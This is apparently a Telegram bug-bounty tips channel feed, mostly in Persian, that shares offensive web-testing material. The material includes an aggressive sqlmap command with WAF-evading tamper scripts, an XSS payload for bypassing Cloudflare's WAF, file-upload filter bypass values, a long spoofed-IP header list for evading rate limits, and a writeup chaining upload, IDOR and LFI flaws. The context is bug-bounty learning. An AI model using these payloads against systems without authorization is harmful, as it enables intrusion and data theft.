Forwarded from HuntLearn
ویدئو حل CTF در یوتیوب آپلود شد!
https://www.youtube.com/watch?v=abaMumpJnqY
ممنون میشیم حمایت کنید و منتظر اخبار جدید ما باشید.
https://www.youtube.com/watch?v=abaMumpJnqY
ممنون میشیم حمایت کنید و منتظر اخبار جدید ما باشید.
YouTube
حل CTF رونمایی هانت لرن؛ از وب تا مهندسی معکوس و ردتیم!
👍7❤2👎1
XSS.PDF
1.1 MB
❤8🙏1
If you found any #swagger public document on your target, make sure you are testing API endpoints, there's can be some endpoints which accessible without any authentication.
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#BugBounty
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#BugBounty
👍5🤝3❤1
Bugbounty Tips
If you found any #swagger public document on your target, make sure you are testing API endpoints, there's can be some endpoints which accessible without any authentication. For more join to channel (: https://news.1rj.ru/str/rootdr_research #Web #BugBounty
این بنده خدا میگه اگه درمراحل تست روی تارگتتون فایل دامیومنت swagger api رو دیدین حتما طبق داکیومنت همه اندپوینت هارو چک کنین، ممکنه برای دسترسی به اطلاعات مهم یا عملیات مهم در اندپوینت های api نیاز به احراز هویت نباشه..
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#BugBounty
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#BugBounty
Telegram
Bugbounty Tips
research and sharing in cybersecurity
❤4👍2
Add subdomain name in your wordlist for default credentials..
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#bugbounty
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#bugbounty
🔥7👍1
Forwarded from Terminal
Here we are! The Compressive SQLMap Command for You!.
RedHunters
sqlmap -u "https://target.com" --crawl=3 --level=5 --risk=3 --tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,commalesslimit,commalessmid,commentbeforeparentheses,concat2concatws,equaltolike,escapequotes,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,overlongutf8,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,varnish,versionedkeywords,versionedmorekeywords,xforwardedfor" --dbs --random-agent --batch --threads=10 --output-dir=InjectionResult --time-sec=10 --retries=3 --flush-session --fresh-queries -v 3
RedHunters
✍4👍2👎2🔥1
یکی از فانکشنالیتی های جذاب توی باگ بانتی برای من بخش تیکتینگ مخصوصا اگر فایل آپلود داشته باشه چون خیلی چیزای مهمی ازش پیدا میشه، داستان NNN میلیون ریال بانتی بالا هم به همین شکله (:
1-آپلودر که خودش شامل چندین تست کیس میشه، چیزایی که من معمولا تست میکنم:
double extention bypass,mime type bypass,magic byte bypass,black list bypass,null byte
به عنوان مثال:
double extention:test.png.html
mime type: image/jpg
magic byte: ÿØÿî
black list: test.php5 or test.phtml
null byte: test.php5%00.jpg
روی بحث دسترسی به فایل هم تست کیس های زیر رو چک میکنم:
IDOR,Broken Access Control:
برای مثال:
IDOR: change the id or check the file with other users
Broken Access Control:
open file with ctrl+shift+n
or delete file with other users
1-آپلودر که خودش شامل چندین تست کیس میشه، چیزایی که من معمولا تست میکنم:
double extention bypass,mime type bypass,magic byte bypass,black list bypass,null byte
به عنوان مثال:
double extention:test.png.html
mime type: image/jpg
magic byte: ÿØÿî
black list: test.php5 or test.phtml
null byte: test.php5%00.jpg
روی بحث دسترسی به فایل هم تست کیس های زیر رو چک میکنم:
IDOR,Broken Access Control:
برای مثال:
IDOR: change the id or check the file with other users
Broken Access Control:
open file with ctrl+shift+n
or delete file with other users
👍3
Bugbounty Tips
یکی از فانکشنالیتی های جذاب توی باگ بانتی برای من بخش تیکتینگ مخصوصا اگر فایل آپلود داشته باشه چون خیلی چیزای مهمی ازش پیدا میشه، داستان NNN میلیون ریال بانتی بالا هم به همین شکله (: 1-آپلودر که خودش شامل چندین تست کیس میشه، چیزایی که من معمولا تست میکنم:…
مواردی که من روی گزارش بالا ارسال کردم:
1-آپلود فایل های مخرب که هیچ پروتکشنی نداشت و من میتونستم هر فایلی رو با هر محتوا و پسوندی آپلود کنم.
2-دسترسی به فایل های تیکتینگ بدون لاگین و احراز هویت، دسترسی به فایل های دیگر کاربران با آسیب پذیری IDOR
3-مهم تر از همه و زیباتر از همه: LFI که همونجور که در تصویر میبینید با نام directory mapping تایید کردن، اینجور بود که درخواست ارسال تیکت و فایل یکپارچه نبود و در 2 مرحله انجام میشد، اول فایل آپلود میشد و بعد filename پیوست تیکت میشد، که در اینجا به دلیل عدم پاکسازی و مکانیزم امنیتی من با تغییر filename به هر فایل حساس سرور یا سورس کد سامانه یا بکاپ های دیتابیس(یه بروت فورس ساده برای اسم فایل ها و کانفیگ ها )میتونستم به فایل های حساس سرور دسترسی داشته باشم که chain شده بود به آسیب پذیری های بالا و هرکسی بدون لاگین میتونست فایل های حساس سرور رو از طریق نوع دولوپ سامانه دانلود کنه.
امیدوارم این موارد براتون مفید بوده باشه.
این تست کیس ها هم جذابه:
https://idego-group.com/blog/2022/02/08/file-upload-vulnerabilities
موارد زیادی هست روی بحث Fileupload,broken access control,IDOR، با ریسرچ و حل کردن لابراتوار های مختلف میشه یادشون گرفت.
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#bugbounty
1-آپلود فایل های مخرب که هیچ پروتکشنی نداشت و من میتونستم هر فایلی رو با هر محتوا و پسوندی آپلود کنم.
2-دسترسی به فایل های تیکتینگ بدون لاگین و احراز هویت، دسترسی به فایل های دیگر کاربران با آسیب پذیری IDOR
3-مهم تر از همه و زیباتر از همه: LFI که همونجور که در تصویر میبینید با نام directory mapping تایید کردن، اینجور بود که درخواست ارسال تیکت و فایل یکپارچه نبود و در 2 مرحله انجام میشد، اول فایل آپلود میشد و بعد filename پیوست تیکت میشد، که در اینجا به دلیل عدم پاکسازی و مکانیزم امنیتی من با تغییر filename به هر فایل حساس سرور یا سورس کد سامانه یا بکاپ های دیتابیس(یه بروت فورس ساده برای اسم فایل ها و کانفیگ ها )میتونستم به فایل های حساس سرور دسترسی داشته باشم که chain شده بود به آسیب پذیری های بالا و هرکسی بدون لاگین میتونست فایل های حساس سرور رو از طریق نوع دولوپ سامانه دانلود کنه.
امیدوارم این موارد براتون مفید بوده باشه.
این تست کیس ها هم جذابه:
https://idego-group.com/blog/2022/02/08/file-upload-vulnerabilities
موارد زیادی هست روی بحث Fileupload,broken access control,IDOR، با ریسرچ و حل کردن لابراتوار های مختلف میشه یادشون گرفت.
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#bugbounty
Idego Group
File upload vulnerabilities | Idego Group
Uploading a file is a common web application task. In many cases, however, the sole act of successfully uploading anything to the server is considered a job done. This is what threat actors lurk for.
👍6❤3
Forwarded from HuntLearn (Iraji Moghaddam)
پلتفرم آموزشی هانتلرن قصد دارد میزبان کنفرانسهای سایبری ماهانه باشد! در این رویدادها، هکرها هر ماه به صورت آنلاین گرد هم میآیند تا دستاوردها، تحقیقات، اخبار و موضوعات مهم یک ماه اخیر را با یکدیگر به اشتراک بگذارند. یک گردهمایی مهیج و کاملاً مفید برای همه، که حضور در آن برای همگان رایگان و آزاده. همچنین، هر کسی میتونه ارائه خودش رو در این کنفرانسها داشته باشه پس اگه حس میکنید موضوع جذابی برای ارائه دارید، موضوعهای خودتون رو جمع کنید و آماده ارائه دادن بشید!
منتظر خبرهای بیشتر از ما در این باره باشید!
منتظر خبرهای بیشتر از ما در این باره باشید!
❤4🔥2
یک نفر اومده با بازی شطرنج بین دوتا بات یک روش استگانوگرافی ابداع کرده..
جالبه:
https://x.com/amirjavadzadee/status/1833259880544673832?s=46
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Link
جالبه:
https://x.com/amirjavadzadee/status/1833259880544673832?s=46
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Link
X (formerly Twitter)
javad (@First_javad) on X
یه برنامهنویس ۱۸ ساله اهل انگلیس به اسم wilson اومده یه کار خیلی فان با سایتهای آنلاین شطرنج انجام داده. در حقیقت تونسته یه ربات بسازه که با بازی شطرنج میشه یه فضای کاملا رایگان و نامحدود داشت برای آپلود هرچیزی که دوست دارید :)
#رشتو
#رشتو
❤2
CAPTCHA Bypass Methods
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#Payloads
#BugBounty
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#Payloads
#BugBounty
👍4❤2🔥2
Forwarded from sn0whacks
🔥پیلود XSS برای دور زدن CloudFlare WAF:
‘>alert(154)</noscript><noscript/154=’;;;;;;;
@sn0whacks
#bugbountyTips
@sn0whacks
#bugbountyTips
👍12❤1
Forwarded from 🔴 خبر فوری | اخبار لحظه ای | اخبار جنگ (Dirin)
This media is not supported in your browser
VIEW IN TELEGRAM
👍12🔥1
Use Akamai-Client-Ip instead of XFF to override YOUR IP to 127.0.0.1
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#Payloads
#bugbounty
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#Payloads
#bugbounty
🔥8
Rate Limit Bypass using HTTP Headers
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#Payloads
#bugbounty
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
Client-IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARD_FOR: 127.0.0.1
FORWARD-FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1
FORWARDED_FOR: 127.0.0.1
FORWARDED-FOR-IP: 127.0.0.1
FORWARDED-FOR: 127.0.0.1
FORWARDED: 127.0.0.1
HTTP-CLIENT-IP: 127.0.0.1
HTTP-FORWARDED-FOR-IP: 127.0.0.1
HTTP-PC-REMOTE-ADDR: 127.0.0.1
HTTP-PROXY-CONNECTION: 127.0.0.1
HTTP-VIA: 127.0.0.1
HTTP-X-FORWARDED-FOR-IP: 127.0.0.1
HTTP-X-IMFORWARDS: 127.0.0.1
HTTP-XROXY-CONNECTION: 127.0.0.1
PC_REMOTE_ADDR: 127.0.0.1
PRAGMA: 127.0.0.1
PROXY_AUTHORIZATION: 127.0.0.1
PROXY_CONNECTION: 127.0.0.1
Proxy-Client-IP: 127.0.0.1
PROXY: 127.0.0.1
REMOTE_ADDR: 127.0.0.1
Source-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Via: 127.0.0.1
VIA: 127.0.0.1
WL-Proxy-Client-IP: 127.0.0.1
X_CLUSTER_CLIENT_IP: 127.0.0.1
X_COMING_FROM: 127.0.0.1
X_DELEGATE_REMOTE_HOST: 127.0.0.1
X_FORWARDED_FOR_IP: 127.0.0.1
X_FORWARDED_FOR: 127.0.0.1
X_FORWARDED: 127.0.0.1
X_IMFORWARDS: 127.0.0.1
X_LOCKING: 127.0.0.1
X_LOOKING: 127.0.0.1
X_REAL_IP: 127.0.0.1
X-Backend-Host: 127.0.0.1
X-BlueCoat-Via: 127.0.0.1
X-Cache-Info: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: 127.0.0.1, 127.0.0.1, 127.0.0.1
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-From-IP: 127.0.0.1
X-From: 127.0.0.1
X-Gateway-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Ip: 127.0.0.1
X-Original-Host: 127.0.0.1
X-Original-IP: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originally-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-ProxyMesh-IP: 127.0.0.1
X-ProxyUser-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-True-Client-IP: 127.0.0.1
XONNECTION: 127.0.0.1
XPROXY: 127.0.0.1
XROXY_CONNECTION: 127.0.0.1
Z-Forwarded-For: 127.0.0.1
ZCACHE_CONTROL: 127.0.0.1
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#Payloads
#bugbounty
Telegram
Bugbounty Tips
research and sharing in cybersecurity
❤7🔥2
this will help you to Bypass csp
http://cspbypass.com/
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#Payloads
#bugbounty
http://cspbypass.com/
For more join to channel (:
https://news.1rj.ru/str/rootdr_research
#Web
#Payloads
#bugbounty
بچه ها این رایتاپ تیم دوم مسابقات المپیک راوین در مرحله مقدماتیه
پ.ن: ASIS خشن مینوازد😂😂
پ.ن: ASIS خشن مینوازد😂😂